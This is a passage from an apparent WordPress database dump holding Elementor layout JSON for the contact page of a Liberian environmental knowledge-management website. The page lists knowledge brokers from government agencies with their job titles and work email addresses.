href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24515,3618,'_elementor_edit_mode','builder'),(24516,3618,'_elementor_template_type','wp-page'),(24517,3618,'_elementor_version','3.0.16'),(24518,3618,'_wp_page_template','default'),(24519,3618,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a 